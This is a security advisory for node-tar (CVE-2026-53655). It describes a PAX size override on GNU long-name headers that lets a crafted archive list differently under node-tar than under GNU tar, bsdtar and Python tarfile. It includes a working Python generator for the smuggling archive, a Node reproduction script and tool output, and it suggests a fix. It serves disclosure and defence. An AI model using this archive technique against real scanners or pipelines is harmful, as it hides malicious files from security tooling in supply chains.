GHSA-VMF3-W455-68VH
Vulnerability from github – Published: 2026-06-15 17:19 – Updated: 2026-06-15 17:19Summary
tar (node-tar) applies a PAX extended header's size= record (and other PAX
overrides) to the next header entry of any type, including intermediary
metadata headers such as a GNU long-name (L) or long-link (K) entry. Per
POSIX pax, a PAX extended header (x) describes the next file entry, not the
intermediary extension headers that may sit between the x header and the file
it annotates. Because node-tar lets the PAX size override the byte length of
an intervening L/K/x header, an attacker can desynchronize node-tar's
stream cursor relative to every other mainstream tar implementation
(GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs /
astral-tokio-tar).
The result is a tar parser interpretation differential (CWE-436): a single
crafted archive yields a different set of members under node-tar than under the
reference tar tools. An attacker can use this to hide a member from one parser
while it is visible to another, which defeats security tooling whose scanner and
extractor disagree on archive contents (e.g. a malware/secret scanner that lists
entries with one library while a downstream step extracts with another). node-tar
is one of the most widely deployed JavaScript tar libraries (it backs npm's own
package-tarball handling and is a transitive dependency of a very large fraction
of the npm ecosystem), so the blast radius for "files that extract differently
depending on the tool" is broad.
This is the same root cause and fix that was just addressed upstream in the Rust
tar ecosystem (tar-rs / astral-tokio-tar); node-tar carries the equivalent
defect and has no equivalent guard.
Impact
- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537).
- A crafted archive can present one logical member list to a tool that lists or
scans with node-tar and a different member list to GNU tar / libarchive /
Python tarfile (and vice versa). This lets a malicious file be hidden from a
scanner that uses a different parser than the eventual extractor, or hidden
from node-tar-based inspection while still landing on disk via a system
tar. - No authentication is required; the only precondition is that a victim parses an attacker-supplied tar with node-tar. Tar archives are routinely fetched from untrusted sources (package registries, user uploads, CI artifacts, container layers).
- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct RCE; it is a building block for supply-chain / scanner-evasion attacks rather than a standalone code-execution primitive.
Vulnerable code (file:line)
src/header.ts (compiled to dist/esm/header.js:49 and
dist/commonjs/header.js:85 in the published tar@7.5.15):
// Header.decode(buf, off, ex, gex)
this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)
ex is the currently-accumulated PAX local extended header and gex the
PAX global header. The size override from ex/gex is applied
unconditionally to whatever header is being decoded next — there is no check
that the header being decoded is a real file entry rather than an intermediary
extension header.
src/parse.ts, [CONSUMEHEADER] constructs the next header with the current
EX/GEX applied:
const header = new Header(chunk, position, this[EX], this[GEX])
and later branches on whether that header is a metadata entry. this[EX] is
cleared only in the non-meta (real file) branch:
if (entry.meta) {
// L / K / x / g metadata entries: this[EX] is left intact here
if (entry.size > this.maxMetaEntrySize) {
entry.ignore = true
this[STATE] = 'ignore'
entry.resume()
} else if (entry.size > 0) {
this[META] = ''
entry.on('data', c => (this[META] += c))
this[STATE] = 'meta'
}
} else {
this[EX] = undefined // EX cleared only once a real file entry is reached
}
When the stream is ordered x (PAX, size=N) -> L (GNU long-name) -> file, the
L header is constructed with this[EX] still set, so its size/remain
becomes N instead of the L payload's true length. node-tar then consumes N
bytes of "metadata" and resumes header parsing at the wrong offset, landing
mid-stream. Every other mainstream parser applies the PAX size only to the
following file entry, so they stay synchronized.
The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is
to not apply PAX size/overrides when the entry being decoded is itself an
extension header (L GNU long-name, K GNU long-link, x PAX local, g PAX
global).
How input reaches the sink
tar.list(), tar.extract()/tar.x(), and tar.Parse/tar.Unpack all route
every 512-byte header block through Header.decode(...) with the
currently-accumulated EX/GEX. Any consumer that parses an attacker-supplied
archive — tar.list, tar.extract, or piping into the streaming Parser —
reaches the sink. No options need to be enabled; the default code path is
affected.
Proof of concept
Archive layout (all standard, GNU-tar-producible blocks):
block 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body)
block 1 : x payload : the single PAX record "...size=2048\n"
block 2 : L header (GNU long-name '././@LongLink'), real size = 13
block 3 : L payload : "longname.txt\0" (the long name for the next file)
block 4 : file header 'file_a', size = 16
block 5 : file_a body (16 bytes, zero-padded to 512)
block 6 : file header 'file_b', size = 16
block 7 : file_b body (16 bytes, zero-padded to 512)
Generator (make_tar.py, pure stdlib, no external deps):
def hdr(name, size, typeflag):
h = bytearray(512); name = name[:100]; h[0:len(name)] = name
h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0'
h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0'
h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00'
h[148:156] = b' ' * 8
cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode()
return bytes(h)
def pad(d):
return d + b'\0' * ((512 - len(d) % 512) % 512)
def pax_record(key, val): # length-prefixed PAX record "LEN key=val\n"
body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body)
while True:
s = str(n).encode() + body
if len(s) == n: break
n = len(s)
return s
pax = pax_record('size', 2048) # malicious: claim size=2048 for the "next" entry
out = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)
out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0')
out += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body')
out += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body')
out += b'\0' * 1024
open('pax-desync.tar', 'wb').write(out)
A negative-control archive is identical except the PAX record is
pax_record('comment', 'x') (no size=), written to pax-control.tar.
End-to-end reproduction (against pinned version tar@7.5.15, latest release)
Install the published package into a clean project and parse both archives:
$ npm init -y >/dev/null && npm install tar@7.5.15
$ node -e "console.log(require('tar/package.json').version)"
7.5.15
$ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js
49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);
e2e.mjs:
import * as tar from 'tar'
async function listEntries(f){
const got=[], warns=[]
await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },
onwarn:(code,_msg)=>warns.push(code) })
return { got, warns }
}
const mal = await listEntries('pax-desync.tar')
console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))
const ctl = await listEntries('pax-control.tar')
console.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))
Verbatim output:
=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===
[MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B)
tar.list() entries : []
tar.list() warnings: ["TAR_ENTRY_INVALID"]
[NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override)
tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}]
tar.list() warnings: []
Reference parsers on the same pax-desync.tar:
$ tar tvf pax-desync.tar
-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar
$ bsdtar tvf pax-desync.tar
-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive
$ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])"
['longname.txt'] # Python tarfile
Interpretation differential: GNU tar, libarchive (bsdtar), and Python tarfile
all extract the member longname.txt from pax-desync.tar, whereas node-tar
7.5.15 desynchronizes, raises TAR_ENTRY_INVALID (checksum failure from
landing mid-stream), and reports zero members. The negative control proves
the divergence is caused solely by the PAX size= override being applied to the
intermediary L header — when the same archive carries a PAX record without
size=, node-tar parses it identically to the reference tools
(longname.txt, file_b).
Suggested fix
When decoding a header, do not apply PAX size (or other PAX overrides) if the
header being decoded is itself an extension header. Concretely, in
src/parse.ts clear/ignore this[EX] (and this[GEX] for size) when the
header's type is ExtendedHeader, GlobalExtendedHeader, NextFileHasLongPath
(GNU L), or NextFileHasLongLinkpath (GNU K); equivalently, in
Header.decode, gate the ex?.size ?? gex?.size override on the decoded type
not being one of those extension types. This mirrors the upstream Rust fix,
which guards pax_size with
is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions.
A fix PR is being prepared against a private fork and will be linked here.
Fix PR
To be linked from a private fork of the repository (the fix will not be pushed to any public fork or to upstream during embargo).
Credits
Reported by tonghuaroot.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.5.15"
},
"package": {
"ecosystem": "npm",
"name": "tar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.16"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-53655"
],
"database_specific": {
"cwe_ids": [
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T17:19:42Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\n`tar` (node-tar) applies a PAX extended header\u0027s `size=` record (and other PAX\noverrides) to the **next header entry of any type**, including intermediary\nmetadata headers such as a GNU long-name (`L`) or long-link (`K`) entry. Per\nPOSIX pax, a PAX extended header (`x`) describes the *next file entry*, not the\nintermediary extension headers that may sit between the `x` header and the file\nit annotates. Because node-tar lets the PAX `size` override the byte length of\nan intervening `L`/`K`/`x` header, an attacker can desynchronize node-tar\u0027s\nstream cursor relative to every other mainstream tar implementation\n(GNU tar, libarchive/bsdtar, Python `tarfile`, and the now-fixed `tar-rs` /\n`astral-tokio-tar`).\n\nThe result is a tar parser **interpretation differential** (CWE-436): a single\ncrafted archive yields a different set of members under node-tar than under the\nreference tar tools. An attacker can use this to hide a member from one parser\nwhile it is visible to another, which defeats security tooling whose scanner and\nextractor disagree on archive contents (e.g. a malware/secret scanner that lists\nentries with one library while a downstream step extracts with another). node-tar\nis one of the most widely deployed JavaScript tar libraries (it backs `npm`\u0027s own\npackage-tarball handling and is a transitive dependency of a very large fraction\nof the npm ecosystem), so the blast radius for \"files that extract differently\ndepending on the tool\" is broad.\n\nThis is the same root cause and fix that was just addressed upstream in the Rust\ntar ecosystem (`tar-rs` / `astral-tokio-tar`); node-tar carries the equivalent\ndefect and has no equivalent guard.\n\n### Impact\n\n- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as\n the prior tar \"smuggling\" advisories GHSA-j5gw-2vrg-8fgx and\n GHSA-fp55-jw48-c537).\n- A crafted archive can present one logical member list to a tool that lists or\n scans with node-tar and a different member list to GNU tar / libarchive /\n Python tarfile (and vice versa). This lets a malicious file be hidden from a\n scanner that uses a different parser than the eventual extractor, or hidden\n from node-tar-based inspection while still landing on disk via a system `tar`.\n- No authentication is required; the only precondition is that a victim parses\n an attacker-supplied tar with node-tar. Tar archives are routinely fetched\n from untrusted sources (package registries, user uploads, CI artifacts,\n container layers).\n- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct\n RCE; it is a building block for supply-chain / scanner-evasion attacks rather\n than a standalone code-execution primitive.\n\n### Vulnerable code (file:line)\n\n`src/header.ts` (compiled to `dist/esm/header.js:49` and\n`dist/commonjs/header.js:85` in the published `tar@7.5.15`):\n\n```ts\n// Header.decode(buf, off, ex, gex)\nthis.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)\n```\n\n`ex` is the currently-accumulated PAX **local** extended header and `gex` the\nPAX **global** header. The `size` override from `ex`/`gex` is applied\nunconditionally to whatever header is being decoded next \u2014 there is no check\nthat the header being decoded is a real *file* entry rather than an intermediary\nextension header.\n\n`src/parse.ts`, `[CONSUMEHEADER]` constructs the next header with the current\n`EX`/`GEX` applied:\n\n```ts\nconst header = new Header(chunk, position, this[EX], this[GEX])\n```\n\nand later branches on whether that header is a metadata entry. `this[EX]` is\ncleared only in the non-meta (real file) branch:\n\n```ts\nif (entry.meta) {\n // L / K / x / g metadata entries: this[EX] is left intact here\n if (entry.size \u003e this.maxMetaEntrySize) {\n entry.ignore = true\n this[STATE] = \u0027ignore\u0027\n entry.resume()\n } else if (entry.size \u003e 0) {\n this[META] = \u0027\u0027\n entry.on(\u0027data\u0027, c =\u003e (this[META] += c))\n this[STATE] = \u0027meta\u0027\n }\n} else {\n this[EX] = undefined // EX cleared only once a real file entry is reached\n}\n```\n\nWhen the stream is ordered `x (PAX, size=N) -\u003e L (GNU long-name) -\u003e file`, the\n`L` header is constructed with `this[EX]` still set, so its `size`/`remain`\nbecomes `N` instead of the `L` payload\u0027s true length. node-tar then consumes `N`\nbytes of \"metadata\" and resumes header parsing at the wrong offset, landing\nmid-stream. Every other mainstream parser applies the PAX `size` only to the\nfollowing *file* entry, so they stay synchronized.\n\nThe correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is\nto **not** apply PAX `size`/overrides when the entry being decoded is itself an\nextension header (`L` GNU long-name, `K` GNU long-link, `x` PAX local, `g` PAX\nglobal).\n\n### How input reaches the sink\n\n`tar.list()`, `tar.extract()`/`tar.x()`, and `tar.Parse`/`tar.Unpack` all route\nevery 512-byte header block through `Header.decode(...)` with the\ncurrently-accumulated `EX`/`GEX`. Any consumer that parses an attacker-supplied\narchive \u2014 `tar.list`, `tar.extract`, or piping into the streaming `Parser` \u2014\nreaches the sink. No options need to be enabled; the default code path is\naffected.\n\n### Proof of concept\n\nArchive layout (all standard, GNU-tar-producible blocks):\n\n```\nblock 0 : x header (PAX local extended, typeflag \u0027x\u0027), its own size = len(pax body)\nblock 1 : x payload : the single PAX record \"...size=2048\\n\"\nblock 2 : L header (GNU long-name \u0027././@LongLink\u0027), real size = 13\nblock 3 : L payload : \"longname.txt\\0\" (the long name for the next file)\nblock 4 : file header \u0027file_a\u0027, size = 16\nblock 5 : file_a body (16 bytes, zero-padded to 512)\nblock 6 : file header \u0027file_b\u0027, size = 16\nblock 7 : file_b body (16 bytes, zero-padded to 512)\n```\n\nGenerator (`make_tar.py`, pure stdlib, no external deps):\n\n```python\ndef hdr(name, size, typeflag):\n h = bytearray(512); name = name[:100]; h[0:len(name)] = name\n h[100:108] = b\u00270000644\\0\u0027; h[108:116] = b\u00270000000\\0\u0027; h[116:124] = b\u00270000000\\0\u0027\n h[124:136] = (\u0027%011o\\0\u0027 % size).encode(); h[136:148] = b\u002700000000000\\0\u0027\n h[156:157] = typeflag; h[257:263] = b\u0027ustar\\0\u0027; h[263:265] = b\u002700\u0027\n h[148:156] = b\u0027 \u0027 * 8\n cs = sum(h); h[148:156] = (\u0027%06o\\0 \u0027 % cs).encode()\n return bytes(h)\n\ndef pad(d):\n return d + b\u0027\\0\u0027 * ((512 - len(d) % 512) % 512)\n\ndef pax_record(key, val): # length-prefixed PAX record \"LEN key=val\\n\"\n body = b\u0027 %s=%s\\n\u0027 % (key.encode(), str(val).encode()); n = len(body)\n while True:\n s = str(n).encode() + body\n if len(s) == n: break\n n = len(s)\n return s\n\npax = pax_record(\u0027size\u0027, 2048) # malicious: claim size=2048 for the \"next\" entry\nout = hdr(b\u0027PaxHeaders/x\u0027, len(pax), b\u0027x\u0027) + pad(pax)\nout += hdr(b\u0027././@LongLink\u0027, 13, b\u0027L\u0027) + pad(b\u0027longname.txt\\0\u0027)\nout += hdr(b\u0027file_a\u0027, 16, b\u00270\u0027) + pad(b\u0027AAAA_file_a_body\u0027)\nout += hdr(b\u0027file_b\u0027, 16, b\u00270\u0027) + pad(b\u0027BBBB_file_b_body\u0027)\nout += b\u0027\\0\u0027 * 1024\nopen(\u0027pax-desync.tar\u0027, \u0027wb\u0027).write(out)\n```\n\nA negative-control archive is identical except the PAX record is\n`pax_record(\u0027comment\u0027, \u0027x\u0027)` (no `size=`), written to `pax-control.tar`.\n\n### End-to-end reproduction (against pinned version `tar@7.5.15`, latest release)\n\nInstall the published package into a clean project and parse both archives:\n\n```\n$ npm init -y \u003e/dev/null \u0026\u0026 npm install tar@7.5.15\n$ node -e \"console.log(require(\u0027tar/package.json\u0027).version)\"\n7.5.15\n$ grep -n \"ex?.size ?? gex?.size\" node_modules/tar/dist/esm/header.js\n49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);\n```\n\n`e2e.mjs`:\n\n```js\nimport * as tar from \u0027tar\u0027\nasync function listEntries(f){\n const got=[], warns=[]\n await tar.list({ file:f, onReadEntry:e=\u003e{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },\n onwarn:(code,_msg)=\u003ewarns.push(code) })\n return { got, warns }\n}\nconst mal = await listEntries(\u0027pax-desync.tar\u0027)\nconsole.log(\u0027MALICIOUS entries :\u0027, JSON.stringify(mal.got), \u0027warnings:\u0027, JSON.stringify(mal.warns))\nconst ctl = await listEntries(\u0027pax-control.tar\u0027)\nconsole.log(\u0027CONTROL entries :\u0027, JSON.stringify(ctl.got), \u0027warnings:\u0027, JSON.stringify(ctl.warns))\n```\n\nVerbatim output:\n\n```\n=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===\n\n[MALICIOUS] archive = x(PAX size=2048) -\u003e L(GNU longname \"longname.txt\") -\u003e file_a(16B) -\u003e file_b(16B)\n tar.list() entries : []\n tar.list() warnings: [\"TAR_ENTRY_INVALID\"]\n\n[NEGATIVE CONTROL] same archive, PAX record is \"comment=x\" (no size= override)\n tar.list() entries : [{\"path\":\"longname.txt\",\"size\":16,\"type\":\"File\"},{\"path\":\"file_b\",\"size\":16,\"type\":\"File\"}]\n tar.list() warnings: []\n```\n\nReference parsers on the **same** `pax-desync.tar`:\n\n```\n$ tar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar\n\n$ bsdtar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive\n\n$ python3 -c \"import tarfile; print([m.name for m in tarfile.open(\u0027pax-desync.tar\u0027).getmembers()])\"\n[\u0027longname.txt\u0027] # Python tarfile\n```\n\nInterpretation differential: GNU tar, libarchive (bsdtar), and Python `tarfile`\nall extract the member `longname.txt` from `pax-desync.tar`, whereas node-tar\n`7.5.15` desynchronizes, raises `TAR_ENTRY_INVALID` (checksum failure from\nlanding mid-stream), and reports **zero** members. The negative control proves\nthe divergence is caused solely by the PAX `size=` override being applied to the\nintermediary `L` header \u2014 when the same archive carries a PAX record without\n`size=`, node-tar parses it identically to the reference tools\n(`longname.txt`, `file_b`).\n\n### Suggested fix\n\nWhen decoding a header, do not apply PAX `size` (or other PAX overrides) if the\nheader being decoded is itself an extension header. Concretely, in\n`src/parse.ts` clear/ignore `this[EX]` (and `this[GEX]` for `size`) when the\nheader\u0027s type is `ExtendedHeader`, `GlobalExtendedHeader`, `NextFileHasLongPath`\n(GNU `L`), or `NextFileHasLongLinkpath` (GNU `K`); equivalently, in\n`Header.decode`, gate the `ex?.size ?? gex?.size` override on the decoded type\nnot being one of those extension types. This mirrors the upstream Rust fix,\nwhich guards `pax_size` with\n`is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions`.\n\nA fix PR is being prepared against a private fork and will be linked here.\n\n### Fix PR\n\nTo be linked from a private fork of the repository (the fix will not be pushed\nto any public fork or to upstream during embargo).\n\n### Credits\n\nReported by tonghuaroot.",
"id": "GHSA-vmf3-w455-68vh",
"modified": "2026-06-15T17:19:42Z",
"published": "2026-06-15T17:19:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"
},
{
"type": "PACKAGE",
"url": "https://github.com/isaacs/node-tar"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.